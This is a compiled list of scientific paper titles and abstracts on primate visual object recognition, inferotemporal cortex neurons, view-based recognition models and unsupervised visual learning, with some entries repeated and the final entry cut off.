paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Inferotemporal units in selective visual attention and short-term memory paper_content: 1. This research was designed to further clarify how, in the primate, the neurons of the inferotemporal (IT) cortex support the cognitive functions of visually guided behavior. Specifically, the aim was to determine the role of those neurons in 1) selective attention to behaviorally relevant features of the visual environment and 2) retention of those features in temporary memory. Monkeys were trained in a memory task in which they had to discriminate and retain individual features of compound stimuli, each stimulus consisting of a colored disk with a gray symbol in the middle. A trial began with brief presentation of one such stimulus, the sample for the trial. Depending on the symbol in it, the monkey had to memorize the symbol itself or the background color; after 10-20 s of delay (retention period), two compound stimuli appeared, and the animal had to choose the one with the symbol or with the color of the sample. Thus the test required attention to the symbol, in some trials also to the color, and short-term retention of the distinctive feature for each trial, either a symbol or a color. Single-unit activity was recorded from cortex of the IT convexity, lower and upper banks of the superior temporal sulcus (STS), and from striate cortex (V1). Firing frequency was analyzed during intertrial periods and during the entirety of every trial, except for the (match) choice period. 2. In IT cortex, as in V1, many units responded to the sample stimulus. Some responded indiscriminately to all samples, whereas others responded selectively to one of their features, i.e., to one symbol or to one color. Fifteen percent of the IT units were symbol selective and 21% color selective. These neurons appeared capable of extracting individual features from complex stimuli. Some color cells (color-attentive units) responded significantly more to their preferred color when it was relevant (i.e., had to be retained) than when it was not. 3. The latency of IT-unit response to the sample stimulus was, on the average, relatively short in unselective units (mean 159 ms), longer in symbol units (mean 203 ms), and longest in color-attentive units (mean 270 ms). This order of latencies corresponds to the presumed order of participation of those three types of units in the selective attention to the component features of the sample as required by the task. It suggests intervening steps of serial processing before color information reached color-attentive cells.(ABSTRACT TRUNCATED AT 400 WORDS) --- paper_title: Image-based object recognition in man, monkey and machine paper_content: Theories of visual object recognition must solve the problem of recognizing 3D objects given that perceivers only receive 2D patterns of light on their retinae. Recent findings from human psychophysics, neurophysiology and machine vision provide converging evidence for ‘image-based’ models in which objects are represented as collections of viewpoint-specific local features. This approach is contrasted with ‘structural-description’ models in which objects are represented as configurations of 3D volumes or parts. We then review recent behavioral results that address the biological plausibility of both approaches, as well as some of their computational advantages and limitations. We conclude that, although the image-based approach holds great promise, it has potential pitfalls that may be best overcome by including structural information. Thus, the most viable model of object recognition may be one that incorporates the most appealing aspects of both image-based and structural-description theories.  1998 Elsevier Science B.V. All rights reserved --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Neocognitron: A self-organizing neural network model for a mechanism of pattern recognition unaffected by shift in position paper_content: A neural network model for a mechanism of visual pattern recognition is proposed in this paper. The network is self-organized by “learning without a teacher”, and acquires an ability to recognize stimulus patterns based on the geometrical similarity (Gestalt) of their shapes without affected by their positions. This network is given a nickname “neocognitron”. After completion of self-organization, the network has a structure similar to the hierarchy model of the visual nervous system proposed by Hubel and Wiesel. The network consits of an input layer (photoreceptor array) followed by a cascade connection of a number of modular structures, each of which is composed of two layers of cells connected in a cascade. The first layer of each module consists of “S-cells”, which show characteristics similar to simple cells or lower order hypercomplex cells, and the second layer consists of “C-cells” similar to complex cells or higher order hypercomplex cells. The afferent synapses to each S-cell have plasticity and are modifiable. The network has an ability of unsupervised learning: We do not need any “teacher” during the process of self-organization, and it is only needed to present a set of stimulus patterns repeatedly to the input layer of the network. The network has been simulated on a digital computer. After repetitive presentation of a set of stimulus patterns, each stimulus pattern has become to elicit an output only from one of the C-cell of the last layer, and conversely, this C-cell has become selectively responsive only to that stimulus pattern. That is, none of the C-cells of the last layer responds to more than one stimulus pattern. The response of the C-cells of the last layer is not affected by the pattern's position at all. Neither is it affected by a small change in shape nor in size of the stimulus pattern. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Neurophysiology of shape processing paper_content: Recent physiological findings are reviewed and synthesized into a model of shape processing and object recognition. Gestalt laws (e.g. good continuation, closure) and ‘non-accidental’ image properties (e.g. colinear terminating lines) are resolved in prestriate visual cortex, (areas V2 and V3) to support the extraction of 2D shape boundaries. Processing of shape continues along a ventral route through inferior temporal (IT) cortex where a vast catalogue of 2D shape primitives is established. Each catalogue entry is size-specific (±0.5 log scale unit) and orientation-specific (±45°), but can generalize over position (±150 degree2). Several shape components are used to activate representations of the approximate appearance of one object type at one view, orientation and size. Subsequent generalization, first over orientation and size, then over view, and finally over object sub-component, is achieved in the anterior temporal cortex by combining descriptions of the same object from different orientations and views, through associative learning. This scheme provides a route to 3D object recognition through 2D shape description and reduces the problem of perceptual invariance to a series of independent analyses with an associative link established between the outputs. The system relies on parallel processing with computations performed in a series of hierarchical steps with relatively simple operations at each stage. --- paper_title: Shape representation in the inferior temporal cortex of monkeys paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Linear Object Classes and Image Synthesis From a Single Example Image paper_content: The need to generate new views of a 3D object from a single real image arises in several fields, including graphics and object recognition. While the traditional approach relies on the use of 3D models, simpler techniques are applicable under restricted conditions. The approach exploits image transformations that are specific to the relevant object class, and learnable from example views of other "prototypical" objects of the same class. In this paper, we introduce such a technique by extending the notion of linear class proposed by the authors (1992). For linear object classes, it is shown that linear transformations can be learned exactly from a basis set of 2D prototypical views. We demonstrate the approach on artificial objects and then show preliminary evidence that the technique can effectively "rotate" high-resolution face images from a single 2D view. --- paper_title: View-based Models of 3D Object Recognition: Invariance to Imaging Transformations paper_content: This report describes the main features of a view-based model of object recognition. The model does not attempt to account for specific cortical structures; it tries to capture general properties to be expected in a biological architecture for object recognition. The basic module is a regularization network (RBF-like; see Poggio and Girosi, 1989; Poggio, 1990) in which each of the hidden units is broadly tuned to a specific view of the object to be recognized. The network output, which may be largely view independent, is first described in terms of some simple simulations. The following refinements and details of the basic module are then discussed: (1) some of the units may represent only components of views of the object--the optimal stimulus for the unit, its "center," is effectively a complex feature; (2) the units' properties are consistent with the usual description of cortical neurons as tuned to multidimensional optimal stimuli and may be realized in terms of plausible biophysical mechanisms; (3) in learning to recognize new objects, preexisting centers may be used and modified, but also new centers may be created incrementally so as to provide maximal view invariance; (4) modules are part of a hierarchical structure--the output of a network may be used as one of the inputs to another, in this way synthesizing increasingly complex features and templates; (5) in several recognition tasks, in particular at the basic level, a single center using view-invariant features may be sufficient. --- paper_title: Becoming a “Greeble” Expert: Exploring Mechanisms for Face Recognition paper_content: Sensitivity to configural changes in face processing has been cited as evidence for face-exclusive mechanisms. Alternatively, general mechanisms could be fine-tuned by experience with homogeneous stimuli. We tested sensitivity to configural transformations for novices and experts with nonface stimuli (“Greebles”). Parts of transformed Greebles were identified via forced-choice recognition. Regardless of expertise level, the recognition of parts in the Studied configuration was better than in isolation, suggesting an object advantage. For experts, recognizing Greeble parts in a Transformed configuration was slower than in the Studied configuration, but only at upright. Thus, expertise with visually similar objects, not faces per se, may produce configural sensitivity. © 1997 Elsevier Science Ltd. --- paper_title: Class similarity and viewpoint invariance in the recognition of 3D objects paper_content: In human vision, the processes and the representations involved in identifying specific individuals are frequently assumed to be different from those used for basic level classification, because classification is largely viewpoint-invariant, but identification is not. This assumption was tested in psychophysical experiments, in which objective similarity between stimuli (and, consequently, the level of their distinction) varied in a controlled fashion. Subjects were trained to discriminate between two classes of computer-generated three-dimensional objects, one resembling monkeys and the other, dogs. Both classes were defined by the same set of 56 parameters, which encoded sizes, shapes, and placement of the limbs, ears, snout, etc. Interpolation between parameter vectors of the class prototypes yielded shapes that changed smoothly between monkey and dog. Withinclass variation was induced in each trial by randomly perturbing all the parameters. After the subjects reached 90% correct performance on a fixed canonical view of each object, discrimination performance was tested for novel views that differed by up to 60 ° from the training view. In experiment 1 (in which the distribution of parameters in each class was unimodal) and in experiment 2 (bimodal classes), the stimuli differed only parametrically and consisted of the same geons (parts), yet were recognized virtually independently of viewpoint in the low-similarity condition. In experiment 3, the prototypes differed in their arrangement of geons, yet the subjects' performance depended significantly on viewpoint in the high-similarity condition. In all three experiments, higher interstimulus similarity was associated with an increase in the mean error rate and, for misorientation of up to 45 °, with an increase in the degree of viewpoint dependence. These results suggest that a geon-level difference between stimuli is neither strictly necessary nor always sufficient for viewpoint-invariant performance. Thus, basic and subordinate-level processes in visual recognition may be more closely related than previously thought. --- paper_title: Representation And Recognition In Vision paper_content: Researchers have long sought to understand what the brain does when we see an object, what two people have in common when they see the same object, and what a "seeing" machine would need to have in common with a human visual system. Recent neurobiological and computational advances in the study of vision have now brought us close to answering these and other questions about representation. In Representation and Recognition in Vision, Shimon Edelman bases a comprehensive approach to visual representation on the notion of correspondence between proximal (internal) and distal similarities in objects. This leads to a computationally feasible and formally veridical representation of distal objects that addresses the needs of shape categorization and can be used to derive models of perceived similarity. Edelman first discusses the representational needs of various visual recognition tasks, and surveys current theories of representation in this context. He then develops a theory of representation that is related to Shepard's notion of second-order isomorphism between representations and their targets. Edelman goes beyond Shepard by specifying the conditions under which the representations can be made formally veridical. Edelman assesses his theory's performance in identification and categorization of 3D shapes and examines it in light of psychological and neurobiological data concerning the object-processing stream in primate vision. He also discusses the connections between his theory and other efforts to understand representation in the brain. --- paper_title: Rotating objects to recognize them: A case study on the role of viewpoint dependency in the recognition of three-dimensional objects. paper_content: Successful object recognition is essential for finding food, identifying kin, and avoiding danger, as well as many other adaptive behaviors. To accomplish this feat, the visual system must reconstruct 3-D interpretations from 2-D “snapshots” falling on the retina. Theories of recognition address this process by focusing on the question of how object representations are encoded with respect to viewpoint. Although empirical evidence has been equivocal on this question, a growing body of surprising results, including those obtained in the experiments presented in this case study, indicates that recognition is often viewpoint dependent. Such findings reveal a prominent role for viewpointdependent mechanisms and provide support for themultiple-views approach, in which objects are encoded as a set of view-specific representations that are matched to percepts using normalization procedures. --- paper_title: Optical imaging of functional organization in the monkey inferotemporal cortex. paper_content: To investigate the functional organization of object recognition, the technique of optical imaging was applied to the primate inferotemporal cortex, which is thought to be essential for object recognition. The features critical for the activation of single cells were first determined in unit recordings with electrodes. In the subsequent optical imaging, presentation of the critical features activated patchy regions around 0.5 millimeters in diameter, covering the site of the electrode penetration at which the critical feature had been determined. Because signals in optical imaging reflect average neuronal activities in the regions, the result directly indicates the regional clustering of cells responding to similar features. --- paper_title: Generalization to Novel Images in Upright and Inverted Faces paper_content: An image of a face depends not only on its shape, but also on the viewing position, illumination conditions, and facial expression. Any face recognition system must overcome the changes in face appearance induced by these factors. To assess the ability of human vision to genralize across changes in illumination and pose of faces, we studied the performance of subjects in a discrimination task with eiether upright or inverted faces. Subjects first learned to discriminate among images of three faces, taken under fixed viewing position an illumination. They were then tested on images of the same faces taken under all combinations of four illuminations and five viewing positions. For upright faces, we found remarkably good generalization to novel conditions. For inverted faces, the generalization to novel views was significantly worse, although the performance on the training images was similar in both cases. --- paper_title: Psychophysical support for a two-dimensional view interpolation theory of object recognition. paper_content: Does the human brain represent objects for recognition by storing a series of two-dimensional snapshots, or are the object models, in some sense, three-dimensional analogs of the objects they represent? One way to address this question is to explore the ability of the human visual system to generalize recognition from familiar to unfamiliar views of three-dimensional objects. Three recently proposed theories of object recognition--viewpoint normalization or alignment of three-dimensional models [Ullman, S. (1989) Cognition 32, 193-254], linear combination of two-dimensional views [Ullman, S. & Basri, R. (1990) Recognition by Linear Combinations of Models (Artificial Intelligence Laboratory, Massachusetts Institute of Technology, Cambridge), A. I. Memo No. 1152], and view approximation [Poggio, T. & Edelman, S. (1990) Nature (London) 343, 263-266]--predict different patterns of generalization to unfamiliar views. We have exploited the conflicting predictions to test the three theories directly in a psychophysical experiment involving computer-generated three-dimensional objects. Our results suggest that the human visual system is better described as recognizing these objects by two-dimensional view interpolation than by alignment or other methods that rely on object-centered three-dimensional models. --- paper_title: Shape representation in the inferior temporal cortex of monkeys paper_content: Background: The inferior temporal cortex (IT) of the monkey has long been known to play an essential role in visual object recognition. Damage to this area results in severe deficits in perceptual learning and object recognition, without significantly affecting basic visual capacities. Consistent with these ablation studies is the discovery of IT neurons that respond to complex two-dimensional visual patterns, or objects such as faces or body parts. What is the role of these neurons in object recognition? Is such a complex configurational selectivity specific to biologically meaningful objects, or does it develop as a result of extensive exposure to any objects whose identification relies on subtle shape differences? If so, would IT neurons respond selectively to recently learned views or features of novel objects? The present study addresses this question by using combined psychophysical and electrophysiological experiments, in which monkeys learned to classify and recognize computer-generated three-dimensional objects. Results: A population of IT neurons was found that responded selectively to views of previously unfamiliar objects. The cells discharged maximally to one view of an object, and their response declined gradually as the object was rotated away from this preferred view. No selective responses were ever encountered for views that the animal systematically failed to recognize. Most neurons also exhibited orientation-dependent responses during view-plane rotations. Some neurons were found to be tuned around two views of the same object, and a very small number of cells responded in a view-invariant manner. For the five different objects that were used extensively during the training of the animals, and for which behavioral performance became view-independent, multiple cells were found that were tuned around different views of the same object. A number of view-selective units showed response invariance for changes in the size of the object or the position of its image within the parafovea. Conclusion: Our results suggest that IT neurons can develop a complex receptive field organization as a consequence of extensive training in the discrimination and recognition of objects. None of these objects had any prior meaning for the animal, nor did they resemble anything familiar in the monkey's environment. Simple geometric features did not appear to account for the neurons' selective responses. These findings support the idea that a population of neurons - each tuned to a different object aspect, and each showing a certain degree of invariance to image transformations - may, as an ensemble, encode at least some types of complex threedimensional objects. In such a system, several neurons may be active for any given vantage point, with a single unit acting like a blurred template for a limited neighborhood of a single view. --- paper_title: Sparse population coding of faces in the inferotemporal cortex. paper_content: How does the brain represent objects in the world? A proportion of cells in the temporal cortex of monkeys responds specifically to objects, such as faces, but the type of coding used by these cells is not known. Population analysis of two sets of such cells showed that information is carried at the level of the population and that this information relates, in the anterior inferotemporal cortex, to the physical properties of face stimuli and, in the superior temporal polysensory area, to other aspects of the faces, such as their familiarity. There was often sufficient information in small populations of neurons to identify particular faces. These results suggest that representations of complex stimuli in the higher visual areas may take the form of a sparse population code. --- paper_title: Responses of Neurons in Inferior Temporal Cortex During MemoryGuided Visual Search paper_content: Chelazzi, Leonardo, John Duncan, Earl K. Miller, and Robert Desimone. Responses of neurons in inferior temporal cortex during memory-guided visual search. J. Neurophysiol. 80: 2918–2940, 1998. A typical scene will contain many different objects, few of which are relevant to behavior at any given moment. Thus attentional mechanisms are needed to select relevant objects for visual processing and control over behavior. We examined this role of attention in the inferior temporal cortex of macaque monkeys, using a visual search paradigm. While the monkey maintained fixation, a cue stimulus was presented at the center of gaze, followed by a blank delay period. After the delay, an array of two to five choice stimuli was presented extrafoveally, and the monkey was rewarded for detecting a target stimulus matching the cue. The behavioral response was a saccadic eye movement to the target in one version of the task and a lever release in another. The array was composed of one “good” stimulus (effective in driving the cell when presented alone) and one or more “poor” stimuli (ineffective in driving the cell when presented alone). Most cells showed higher delay activity after a good stimulus used as the cue than after a poor stimulus. The baseline activity of cells was also higher preceding a good cue, if the animal expected it to occur. This activity may depend on a top-down bias in favor of cells coding the relevant stimulus. When the choice array was presented, most cells showed suppressive interactions between the stimuli as well as strong attention effects. When the choice array was presented in the contralateral visual field, most cells initially responded the same, regardless of which stimulus was the target. However, within 150–200 ms of array onset, responses were determined by the target stimulus. If the target was the good stimulus, the response to the array became equal to the response to the good stimulus presented alone. If the target was a poor stimulus, the response approached the response to that stimulus presented alone. Thus the influence of the nontarget stimulus was eliminated. These effects occurred well in advance of the behavioral response. When the array was positioned with stimuli on opposite sides of the vertical meridian, the contralateral stimulus appeared to dominate the response, and this dominant effect could not be overcome by attention. Overall, the results support a “biased competition” model of attention, according to which 1 ) objects in the visual field compete for representation in the cortex, and 2 ) this competition is biased in favor of the behaviorally relevant object by virtue of “top-down” feedback from structures involved in working memory. --- paper_title: High-Level Vision: Object Recognition and Visual Cognition paper_content: Object recognition: shape-based recognition what is recognition? why object recognition is difficult. Approaches to object recognition: invariant properties and feature spaces parts and structural descriptions the alignment approach which is the correct approach?. The alignment of pictorial descriptions: using corresponding features the use of multiple models for 3-D objects aligning pictorial descriptions transforming the image or the models? before and after alignment. The alignment of smooth bounding contours: the curvate method accuracy of the curvature method empirical testing. Recognition by the combination of views: modelling objects by view combinations objects with sharp edges using two views only using a single view the use of depth values summary of the basic scheme objects with smooth boundaries recognition by image combinations extensions to the view-combination scheme psychophysical and physiological evidence interim conclusions: recognition by multiple views. Classifications: classification and identification the role of object classification class-based processing using class prototypes pictorial classification evidence from psychology and biology are classes in the world or in our head? the organization of recognition memory. Image and model correspondence: feature correspondence contour matching correspondence-less methods correspondence processes in human vision model construction compensating for illumination changes. Segmentation and saliency: is segmentation feasible? bottom-up and top-down segmentation extracting globally salient structures saliency, selection, and completion what can bottom-up segmentation achieve? Visual cognition and visual routines: perceiving "inside" and "outside" spatial analysis by visual routines conclusions and open problems the elemental operations the assembly and storage of routines routines and recognition. Sequence seeking and counter streams - a model for visual cortex: the sequence-seeking scheme biological embodiment summary. Appendices: alignment by feature the curvature method errors of the curvature method locally affine matching definitions. --- paper_title: Shifts in selective visual attention: towards the underlying neural circuitry paper_content: A number of psychophysical studies concerning the detection, localization and recognition of objects in the visual field have suggested a two-stage theory of human visual perception. The first stage is the “preattentive” mode, in which simple features are processed rapidly and in parallel over the entire visual field. In the second, “attentive” mode, a specialized processing focus, usually called the focus of attention, is directed to particular locations in the visual field. The analysis of complex forms and the recognition of objects are associated with this second stage.1 The computational justification for such a hypothesis comes from the realization that while it is possible to imagine specific algorithms performing tasks such as shape analysis and recognition at specific locations, it is difficult to imagine these algorithms operating in parallel over the whole visual scene, since such an approach will quickly lead to a combinatorial explosion in terms of required computational resources.2 This is essentially the major critique of Minsky and Papert to a universal application of perceptrons in visual perception.3 Taken together, these empirical and theoretical studies suggest that beyond a certain preprocessing stage, the analysis of visual information proceeds in a sequence of operations, each one applied to a selected location (or locations). --- paper_title: Neural Mechanisms of Visual Working Memory in Prefrontal Cortex of the Macaque paper_content: Prefrontal (PF) cells were studied in monkeys performing a delayed matching to sample task, which requires working memory. The stimuli were complex visual patterns and to solve the task, the monkeys had to discriminate among the stimuli, maintain a memory of the sample stimulus during the delay periods, and evaluate whether a test stimulus matched the sample presented earlier in the trial. PF cells have properties consistent with a role in all three of these operations. Approximately 25% of the cells responded selectively to different visual stimuli. Half of the cells showed heightened activity during the delay after the sample and, for many of these cells, the magnitude of delay activity was selective for different samples. Finally, more than half of the cells responded differently to the test stimuli depending on whether they matched the sample. Because inferior temporal (IT) cortex also is important for working memory, we compared PF cells with IT cells studied in the same task. Compared with IT cortex, PF responses were less often stimulus-selective but conveyed more information about whether a given test stimulus was a match to the sample. Furthermore, sample-selective delay activity in PF cortex was maintained throughout the trial even when other test stimuli intervened during the delay, whereas delay activity in IT cortex was disrupted by intervening stimuli. The results suggest that PF cortex plays a primary role in working memory tasks and may be a source of feedback inputs to IT cortex, biasing activity in favor of behaviorally relevant stimuli. --- paper_title: Modeling Perceptual Grouping and Figure-Ground Segregation by Means of Active Reentrant Connections paper_content: Abstract ::: The segmentation of visual scenes is a fundamental process of early vision, but the underlying neural mechanisms are still largely unknown. Theoretical considerations as well as neurophysiological findings point to the importance in such processes of temporal correlations in neuronal activity. In a previous model, we showed that reentrant signaling among rhythmically active neuronal groups can correlate responses along spatially extended contours. We now have modified and extended this model to address the problems of perceptual grouping and figure-ground segregation in vision. A novel feature is that the efficacy of the connections is allowed to change on a fast time scale. This results in active reentrant connections that amplify the correlations among neuronal groups. The responses of the model are able to link the elements corresponding to a coherent figure and to segregate them from the background or from another figure in a way that is consistent with the so-called Gestalt laws. --- paper_title: Neural correlates of feature selective memory and pop-out in extrastriate area V4 paper_content: Neural activity in area V4 was examined to assess (1) whether the effects of attentive selection for stimulus features could be based on the memory of the feature, (2) whether dynamically changing the feature selection would cause activity associated with the newly selected stimuli to pop out, and (3) whether intrusion of more than one stimulus into the receptive field would disrupt the feature-selective activity. Rhesus monkeys were trained on several variations of a conditional orientation discrimination task. A differential activation of area V4 neurons was observed in the conditional discrimination task based on the presence of a match or a nonmatch between the conditional cue (a particular color or luminance) and the color or luminance of the receptive field stimulus. The differential activation was unchanged when the cue was removed and the animal had to remember its color (or luminance) to perform the task. When the cued feature was switched from one alternative to another in the middle of a trial the differential activation of neurons reversed over the course of 150–300 msec. If the stimulus in the receptive field contained the newly selected feature, V4 neurons became activated without a concomitant change in the stimulus in classical receptive field. Across the topographic map of V4 the activity associated with the newly selected stimuli popped out, whereas the activity of deselected stimuli faded to the background levels of other background objects. Evidence of a suppressive input from stimuli outside the classical receptive field was clear in only 3 of 24 neurons examined. Intrusion into the classical receptive field by a second stimulus resulted in a diminished difference between matching and nonmatching conditions. These physiological data suggest a major role for attentional control in the parallel processing of simple feature-selective differences. --- paper_title: The wake-sleep algorithm for unsupervised neural networks paper_content: An unsupervised learning algorithm for a multilayer network of stochastic neurons is described. Bottom-up "recognition" connections convert the input into representations in successive hidden layers, and top-down "generative" connections reconstruct the representation in one layer from the representation in the layer above. In the "wake" phase, neurons are driven by recognition connections, and generative connections are adapted to increase the probability that they would reconstruct the correct activity vector in the layer below. In the "sleep" phase, neurons are driven by generative connections, and recognition connections are adapted to increase the probability that they would produce the correct activity vector in the layer above. --- paper_title: State dependent activity in monkey visual cortex paper_content: Responses were recorded from isolated neurons in the visual cortex of rhesus monkeys while they performed an orientation match to sample task. In each trial the animal was first cued with randomly selected orientation, and then presented with a sequence of gratings whose orientations were randomly selected. The animal was required to release a switch when it saw a grating that matched the cued orientation. For some recordings the animal was given a tactile cue by having it feel the orientation of a grooved plate that it could not see. In other experiments the cue orientation was presented visually on the screen in front of the animal and then removed before the sequence of gratings was presented. Using this task it was possible to determine if a neuron's response to a particular orientation was affected by whether or not it was the orientation for which the animal was looking. Over half the neurons examined in V4 (110/192) responded differently to the visual stimuli when the animal was cued to look for different orientations. For some neurons responses to all stimuli were strong when the animal was cued to look for a particular orientation, but weak when the same stimuli were presented in trials where the animal had been cued to look for another orientation. This type of sensitivity was found in neurons recorded while the animal was given a tactile cue, and also in other neurons tested when a visual cue was used, suggesting that the activity was not of direct sensory origin. In support of this, neurons in V4 were not strongly affected when the animal felt the grooved plate while not performing the orientation matching task. The prevalence of behavioral effects that was found using the orientation matching task suggests that extraretinal signals represent a prominent component of the activity in V4 of the behaving monkey. --- paper_title: Emergence of Phase- and Shift-Invariant Features by Decomposition of Natural Images into Independent Feature Subspaces paper_content: Olshausen and Field (1996) applied the principle of independence maximization by sparse coding to extract features from natural images. This leads to the emergence of oriented linear filters that have simultaneous localization in space and in frequency, thus resembling Gabor functions and simple cell receptive fields. In this article, we show that the same principle of independence maximization can explain the emergence of phase- and shift-invariant features, similar to those found in complex cells. This new kind of emergence is obtained by maximizing the independence between norms of projections on linear subspaces (instead of the independence of simple linear filter outputs). The norms of the projections on such "independent feature subspaces" then indicate the values of invariant features. --- paper_title: Emergence of simple-cell receptive field properties by learning a sparse code for natural images paper_content: THE receptive fields of simple cells in mammalian primary visual cortex can be characterized as being spatially localized, oriented1–4 and bandpass (selective to structure at different spatial scales), comparable to the basis functions of wavelet transforms5,6. One approach to understanding such response properties of visual neurons has been to consider their relationship to the statistical structure of natural images in terms of efficient coding7–12. Along these lines, a number of studies have attempted to train unsupervised learning algorithms on natural images in the hope of developing receptive fields with similar properties13–18, but none has succeeded in producing a full set that spans the image space and contains all three of the above properties. Here we investigate the proposal8,12 that a coding strategy that maximizes sparseness is sufficient to account for these properties. We show that a learning algorithm that attempts to find sparse linear codes for natural scenes will develop a complete family of localized, oriented, bandpass receptive fields, similar to those found in the primary visual cortex. The resulting sparse image code provides a more efficient representation for later stages of processing because it possesses a higher degree of statistical independence among its outputs. --- paper_title: Learning Invariance From Transformation Sequences paper_content: The visual system can reliably identify objects even when the retinal image is transformed considerably by commonly occurring changes in the environment. A local learning rule is proposed, which allows a network to learn to generalize across such transformations. During the learning phase, the network is exposed to temporal sequences of patterns undergoing the transformation. An application of the algorithm is presented in which the network learns invariance to shift in retinal position. Such a principle may be involved in the development of the characteristic shift invariance property of complex cells in the primary visual cortex, and also in the development of more complicated invariance properties of neurons in higher visual areas. --- paper_title: Object classification using a fragment-based representation paper_content: The tasks of visual object recognition and classification are natural and effortless for biological visual systems, but exceedingly difficult to replicate in computer vision systems. This difficulty arises from the large variability in images of different objects within a class, and variability in viewing conditions. In this paper we describe a fragment-based method for object classification. In this approach objects within a class are represented in terms of common image fragments, that are used as building blocks for representing a large variety of different objects that belong to a common class, such as a face or a car. Optimal fragments are selected from a training set of images based on a criterion of maximizing the mutual information of the fragments and the class they represent. For the purpose of classification the fragments are also organized into types, where each type is a collection of alternative fragments, such as different hairline or eye regions for face classification. During classification, the algorithm detects fragments of the different types, and then combines the evidence for the detected fragments to reach a final decision. The algorithm verifies the proper arrangement of the fragments and the consistency of the viewing conditions primarily by the conjunction of overlapping fragments. The method is different from previous part-based methods in using class-specific overlapping object fragments of varying complexity, and in verifying the consistent arrangement of the fragments primarily by the conjunction of overlapping detected fragments. Experimental results on the detection of face and car views show that the fragment-based approach can generalize well to completely novel image views within a class while maintaining low mis-classification error rates. We briefly discuss relationships between the proposed method and properties of parts of the primate visual system involved in object perception. --- paper_title: Categorical Perception: The Groundwork of Cognition paper_content: List of contributors Preface Introduction: psychophysical and cognitive aspects of categorical perception: a critical overview S. Harnad Part I. Psychophysical 